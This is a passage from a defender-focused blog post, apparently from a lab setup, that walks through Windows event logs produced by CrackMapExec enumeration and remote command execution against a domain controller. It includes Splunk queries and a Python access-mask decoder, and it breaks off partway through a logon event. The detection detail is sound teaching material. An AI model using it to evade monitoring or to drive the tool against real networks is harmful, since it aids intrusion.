Thursday, May 2, 2019

Having Fun with CrackMapExec - Log Analysis

In the previous post, we looked at crackmapexec from the perspective of the attacker. From the defender's perspective, let's first take a look at the logs generated when crackmapexec is run against our network. Only one of the devices is configured to forward its logs to Splunk, so that is the host we see reporting the initial scan. In other words, while multiple devices are on this network, not all of them forward their logs to a centralized logging solution. That is normally true of production networks as well, so keep in mind that what follows is a single host's view of the activity.

04/07/2019 11:08:41 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=3
EventType=4
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
TaskCategory=Network connection detected (rule: NetworkConnect)
OpCode=Info
RecordNumber=12826
Keywords=None
Message=Network connection detected:
RuleName: 
UtcTime: 2019-04-08 06:08:40.639
ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000}
ProcessId: 4
Image: System
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.0.0.105
SourceHostname: SECNIK-2K19.securitynik.local
SourcePort: 445
SourcePortName: microsoft-ds
DestinationIsIpv6: false
DestinationIp: 10.0.0.100
DestinationHostname: 
DestinationPort: 34564
DestinationPortName:

From the above, Sysmon (Event ID 3) reports a TCP connection between the monitored host at 10.0.0.105, port 445 (SMB), and the host at 10.0.0.100 on ephemeral port 34564. Note "Initiated: false": the connection was accepted, not initiated, by 10.0.0.105, so although Sysmon lists the local side as the "source", the connection was actually opened by 10.0.0.100 towards port 445. That is consistent with the initial scan coming from 10.0.0.100.

As we look below, we see an example of the shares being accessed:

04/08/2019 06:19:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=43571
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access. 

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x5B3EF6

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  35710

Share Information:
 Share Name:  \\*\SYSVOL
 Share Path:  \??\C:\Windows\SYSVOL\sysvol
 Relative Target Name: LusqPJemAo

Access Request Information:
 Access Mask:  0x110080
 Accesses:  DELETE
    SYNCHRONIZE
    ReadAttributes

Access Check Results:
 DELETE: Granted by D:(A;;FA;;;BA)
    SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD)
    ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)


Let's get a better view of these share accesses via an image. Here is the filter I used in Splunk to see this data:

*  NOT "Files\\SplunkUniversalForwarder"  NOT "0:0:0:0:0:0:0:1"  NOT "127.0.0.1"  NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" 
|  stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name

[Image: Splunk results table of the share accesses from 10.0.0.100, not reproduced here]

Looking at the user enumeration, the first event we see is the Windows Filtering Platform (Event ID 5156) permitting the inbound connection from 10.0.0.100 to port 445 on 10.0.0.105.

04/09/2019 06:08:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=53458
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.

Application Information:
 Process ID:  4
 Application Name: System

Network Information:
 Direction:  Inbound
 Source Address:  10.0.0.100
 Source Port:  36662
 Destination Address: 10.0.0.105
 Destination Port:  445
 Protocol:  6

Filter Information:
 Filter Run-Time ID: 0
 Layer Name:  Receive/Accept
 Layer Run-Time ID: 44


After the firewall permit, we see the "Administrator" account logged on successfully (Event ID 4624). Note the Logon Type of 3 (network logon), the NTLM V2 authentication package, and that the logon arrived from the same source port, 36662, as the permitted connection above. The source port is what lets us tie the firewall event, the logon and the share accesses that follow into one connection.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=53461
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  36662

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

This event is generated when a logon session is created. It is generated on the computer that was accessed.

Next we see the "Administrator" account from source IP address 10.0.0.100 accessing the share "\\*\IPC$" (Event ID 5140).

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=53462
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \\*\IPC$
 Share Path:  

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

After the share has been accessed, we see below that permissions are being checked on the share. Note the Relative Target Name of "samr": this is the named pipe for the Security Account Manager Remote (SAMR) protocol, which is what is used to enumerate users and groups.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=53463
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \\*\IPC$
 Share Path:  
 Relative Target Name: samr

Access Request Information:
 Access Mask:  0x3
 Accesses:  ReadData (or ListDirectory)
    WriteData (or AddFile)

Access Check Results:
 -

We next see a handle being requested to an object (Event ID 4661), handled by the "lsass.exe" process. From the requested accesses, in particular "ListAccounts", we can conclude that the accounts in the domain were being listed. Event 4661 can describe a handle to either an Active Directory object or a SAM object; since this host is a domain controller (the Object Name is the domain's distinguished name, DC=securitynik,DC=local, rather than a local machine SAM domain), the SAM database here is backed by Active Directory. Note also that the requested access mask 0xF01FD asks for far more than read access (WRITE_DAC, WRITE_OWNER, CreateUser and so on). It is granted because the account in use is the domain Administrator.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53464
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x2555508d260

Process Information:
 Process ID: 0x22c
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -

 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}
 
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership

ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0

Similarly, we see yet another handle request. This time the Object Type is SAM_USER and the Object Name is the SID of the Administrator account, and the requested accesses include "ListGroups", i.e. the groups this user belongs to are being read. As above, additional information is being retrieved: the property set GUIDs listed at the end identify the attribute sets being accessed.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53465
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_USER
 Object Name: S-1-5-21-4078604576-3869073289-8028338-500
 Handle ID: 0x2555508e5a0

Process Information:
 Process ID: 0x22c
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadGeneralInformation
    ReadPreferences
    WritePreferences
    ReadLogon
    ReadAccount
    WriteAccount
    SetPassword (without knowledge of old password)
    ListGroups

 Access Reasons:  -
 Access Mask: 0xF01BF
 Privileges Used for Access Check: -
 Properties: ---
 {bf967aba-0de6-11d0-a285-00aa003049e2}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadGeneralInformation
ReadPreferences
WritePreferences
ReadLogon
ReadAccount
WriteAccount
SetPassword (without knowledge of old password)

ListGroups
  {59ba2f42-79a2-11d0-9020-00c04fc2d3cf}
   {bf967938-0de6-11d0-a285-00aa003049e2}
   {5fd42471-1262-11d0-a060-00aa006c33ed}
   {bf9679e8-0de6-11d0-a285-00aa003049e2}
   {bf967a00-0de6-11d0-a285-00aa003049e2}
   {3e0abfd0-126a-11d0-a060-00aa006c33ed}
   {bf967a6a-0de6-11d0-a285-00aa003049e2}
   {bf967953-0de6-11d0-a285-00aa003049e2}
  {4c164200-20c0-11d0-a768-00aa006e0529}
   {bf967915-0de6-11d0-a285-00aa003049e2}
   {bf967a0a-0de6-11d0-a285-00aa003049e2}
   {bf967a68-0de6-11d0-a285-00aa003049e2}
   {bf967a6d-0de6-11d0-a285-00aa003049e2}
  {5f202010-79a5-11d0-9020-00c04fc2d4cf}
   {bf96792e-0de6-11d0-a285-00aa003049e2}
   {bf967985-0de6-11d0-a285-00aa003049e2}
   {bf967986-0de6-11d0-a285-00aa003049e2}
   {bf967996-0de6-11d0-a285-00aa003049e2}
   {bf967997-0de6-11d0-a285-00aa003049e2}
   {bf9679aa-0de6-11d0-a285-00aa003049e2}
   {bf9679ab-0de6-11d0-a285-00aa003049e2}
   {bf9679ac-0de6-11d0-a285-00aa003049e2}
   {bf967a05-0de6-11d0-a285-00aa003049e2}
   {bf9679a8-0de6-11d0-a285-00aa003049e2}
  {e48d0154-bcf8-11d1-8702-00c04fb96050}
   {bf967950-0de6-11d0-a285-00aa003049e2}
  {bc0ac240-79a9-11d0-9020-00c04fc2d4cf}
   {bf967991-0de6-11d0-a285-00aa003049e2}
  {ab721a53-1e2f-11d0-9819-00aa0040529b}
  {00299570-246d-11d0-a768-00aa006e0529}
  {7ed84960-ad10-11d0-8a92-00aa006e0529}

 Restricted SID Count: 0


Let's now look at the logs to see how we might discover when the request was made to enumerate the password policy.


04/17/2019 08:11:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=150020
Keywords=Audit Success
Message=A handle to an object was requested.



Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x55E205

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x1fa0565e940

Process Information:
 Process ID: 0x234
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

   
 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -
 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership
ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0


The above reflects the password policy being requested ("ReadPasswordParameters"), along with other domain parameters. Note that this event carries the same access mask (0xF01FD on the SAM_DOMAIN object) as the handle request seen during the user enumeration, so the access mask alone does not tell you which SAMR operation followed; it tells you that a client opened the domain object over SAMR. See the reference section for the link used to translate these values.
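To translate these masks without the lookup table, here is an added Python example (mine, not from the post or the crackmapexec project) that decodes the Access Mask fields of the file-share events (5140/5145) earlier in the post and of the SAM handle requests (4661) in this section, and parses the "Granted by" SDDL ACE strings from the SYSVOL event. The bit values come from winnt.h and MS-SAMR; the SDDL alias tables cover only the aliases that appear on this page plus a few common ones, and that selection is my own.

```python
"""Decode the Access Mask values printed in Windows Security events 5145 and 4661.

Added example for this post (not the author's code). Bit values come from the
Windows SDK winnt.h (file and standard rights) and MS-SAMR (SAM domain/user
rights); names follow the strings the event log prints where this post shows
them, and the MS-SAMR constant names otherwise.
"""
import re

FILE_RIGHTS = {
    0x001: "ReadData (or ListDirectory)",
    0x002: "WriteData (or AddFile)",
    0x004: "AppendData (or AddSubdirectory or CreatePipeInstance)",
    0x008: "ReadEA",
    0x010: "WriteEA",
    0x020: "Execute/Traverse",
    0x040: "DeleteChild",
    0x080: "ReadAttributes",
    0x100: "WriteAttributes",
}
STANDARD_RIGHTS = {  # shared by every securable object, so consulted for all types
    0x010000: "DELETE",
    0x020000: "READ_CONTROL",
    0x040000: "WRITE_DAC",
    0x080000: "WRITE_OWNER",
    0x100000: "SYNCHRONIZE",
}
SAM_DOMAIN_RIGHTS = {
    0x001: "ReadPasswordParameters", 0x002: "DOMAIN_WRITE_PASSWORD_PARAMS",
    0x004: "ReadOtherParameters", 0x008: "WriteOtherParameters",
    0x010: "CreateUser", 0x020: "CreateGlobalGroup", 0x040: "CreateLocalGroup",
    0x080: "GetLocalGroupMembership", 0x100: "ListAccounts",
    0x200: "DOMAIN_LOOKUP", 0x400: "DOMAIN_ADMINISTER_SERVER",
}
SAM_USER_RIGHTS = {
    0x001: "ReadGeneralInformation", 0x002: "ReadPreferences",
    0x004: "WritePreferences", 0x008: "ReadLogon", 0x010: "ReadAccount",
    0x020: "WriteAccount", 0x040: "USER_CHANGE_PASSWORD",
    0x080: "SetPassword (without knowledge of old password)", 0x100: "ListGroups",
    0x200: "USER_READ_GROUP_INFORMATION", 0x400: "USER_WRITE_GROUP_INFORMATION",
}
OBJECT_RIGHTS = {"File": FILE_RIGHTS, "SAM_DOMAIN": SAM_DOMAIN_RIGHTS, "SAM_USER": SAM_USER_RIGHTS}

# Rights that modify or destroy a file object; handy for hunting writes to admin shares.
WRITE_LIKE_BITS = 0x002 | 0x004 | 0x010 | 0x040 | 0x100 | 0x010000 | 0x040000 | 0x080000


def decode_access_mask(mask, object_type="File"):
    """Return the names of the rights set in mask for the given Object Type.

    mask may be an int or the hex string as printed in the event ("0x110080").
    Unknown bits are returned as hex so nothing is silently dropped.
    """
    if isinstance(mask, str):
        mask = int(mask, 16)
    specific = OBJECT_RIGHTS[object_type]
    names = []
    for bit in range(32):
        flag = 1 << bit
        if mask & flag:
            names.append(specific.get(flag) or STANDARD_RIGHTS.get(flag) or f"0x{flag:x}")
    return names


def is_write_like(mask):
    """True if a file-share access mask asks for any write, append or delete right."""
    if isinstance(mask, str):
        mask = int(mask, 16)
    return bool(mask & WRITE_LIKE_BITS)


# SDDL aliases as they appear in the "Granted by" results of event 5145 (subset, my choice).
SID_ALIASES = {"BA": "BUILTIN\\Administrators", "WD": "Everyone", "SY": "NT AUTHORITY\\SYSTEM",
               "AU": "Authenticated Users", "BU": "BUILTIN\\Users"}
RIGHTS_ALIASES = {"FA": 0x1F01FF, "FR": 0x120089, "FW": 0x120116, "FX": 0x1200A0}
ACE_RE = re.compile(r"\((?P<type>[AD]);[^;]*;(?P<rights>[^;]*);[^;]*;[^;]*;(?P<sid>[^)]+)\)")


def parse_ace(text):
    """Parse one SDDL ACE such as 'D:(A;;0x1200a9;;;WD)' into who was granted what."""
    m = ACE_RE.search(text)
    if not m:
        raise ValueError(f"no ACE found in {text!r}")
    rights = m["rights"]
    mask = RIGHTS_ALIASES[rights] if rights in RIGHTS_ALIASES else int(rights, 16)
    return {
        "allow": m["type"] == "A",
        "trustee": SID_ALIASES.get(m["sid"], m["sid"]),
        "mask": mask,
        "rights": decode_access_mask(mask),
    }


if __name__ == "__main__":
    # The masks from the events shown in this post.
    for mask, obj in (("0x110080", "File"), ("0x3", "File"),
                      ("0xF01FD", "SAM_DOMAIN"), ("0xF01BF", "SAM_USER")):
        print(obj, mask, decode_access_mask(mask, obj))
    print(parse_ace("D:(A;;0x1200a9;;;WD)"))
```

Run against the masks on this page, 0xF01FD and 0xF01BF expand to exactly the twelve accesses each 4661 lists, and "D:(A;;0x1200a9;;;WD)" turns out to be read, read-EA, execute and read-attributes for Everyone, which is why SYNCHRONIZE and ReadAttributes on SYSVOL are granted to anyone at all.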

Let's now see what the communication looks like when crackmapexec runs a PowerShell command.

To help us understand the connections which are created, let's take a look at some statistics via Splunk. Specifically, along with some important information, let's identify the different logon sessions. We can track these via the "Logon_ID" field as shown below.


* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) 
|  stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name

Source_Address              Source_Port  Logon_ID  Account_Name   Share_Name   count
10.0.0.100                  53494        0xB48A3E  Administrator  \\*\C$       21
10.0.0.100                  53496        0xB48A64  Administrator  \\*\IPC$     2
fe80::89f9:808e:8310:538e   56096        0xB4D870  SECNIK-2K19$   \\*\SYSVOL   2
fe80::89f9:808e:8310:538e   56100        0xB5543B  SECNIK-2K19$   \\*\SYSVOL   3
fe80::89f9:808e:8310:538e   56103        0x3E4     SECNIK-2K19$   \\*\IPC$     1

From the information above, it looks like the first session is the busiest. Let's look into that session to see what we can figure out.

Using a filter which focuses in on Logon_ID "0xB48A3E", we see the following:

04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172526
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53494

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Above we see user "Administrator" log on successfully from 10.0.0.100:53494 and get assigned the Logon ID "0xB48A3E".

We then see below that the share name "\\*\C$" was accessed via a read (or list directory) action.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=172553
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

Next, we see below that the relative target "Windows\Temp\kJpSGP" on the C$ share was checked for ReadData access. The random six-character file name under Windows\Temp is a tell: it is the file to which the output of the remotely executed command is redirected, and the client reading it over the share is how the command output gets back to crackmapexec.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172554
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:


Next, a second later, we see the same check again on "Windows\Temp\kJpSGP" for ReadData access. Repeated reads of the same freshly created file in quick succession is consistent with a client polling for the command output to appear.


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172568
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:

Following the event above, we see below that a check was done for the permissions needed to delete the file (DELETE together with ReadAttributes, access mask 0x10080). Create, read, then delete of a randomly named file under Windows\Temp over the C$ share is the output-file lifecycle of this style of remote command execution, and is itself worth alerting on.


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172570
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x10080
 Accesses:  DELETE
    ReadAttributes

Access Check Results:

Similar to the above, there were a number of these checks to see if the necessary permissions were in place. In the interest of space and time, I chose to leave them out of this analysis.

Ultimately, this account logged off as shown below.


04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172610
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Logon Type:   3

Let's now see what is going on with the logon ID "0xB48A64" which is associated with IP 10.0.0.100.


04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172530
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53496

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Above we see the logon which is ultimately followed by a logoff as shown below.


04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172609
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64

Logon Type:   3

At this point my conclusion was that we had missed something in our analysis, and the cause had to be our initial filter. While that filter helped us detect some activity, it did not show us where the actual PowerShell command was executed. There are two reasons for this. First, the filter excludes "127.0.0.1", and, as we will see, part of this activity is performed over the loopback address. Second, "stats count by ... Share_Name" only counts events that have every one of the listed fields, so logon (4624) and process creation (4688) events, which carry no Share_Name, are silently dropped from the table. Let's step back for a second and look between the logon and logoff times above to see what transpired in between.

Scrolling through the logs, I noticed a Logon ID which was not caught by my previous filter: "0xB48AC1". You may also notice that its source, 10.0.0.100:37794, did not appear in the table above. Hopefully my oversight helps you understand how easy it is to miss important evidence when a summary query quietly excludes events.

Below we see that the account was able to log on successfully.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172543
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
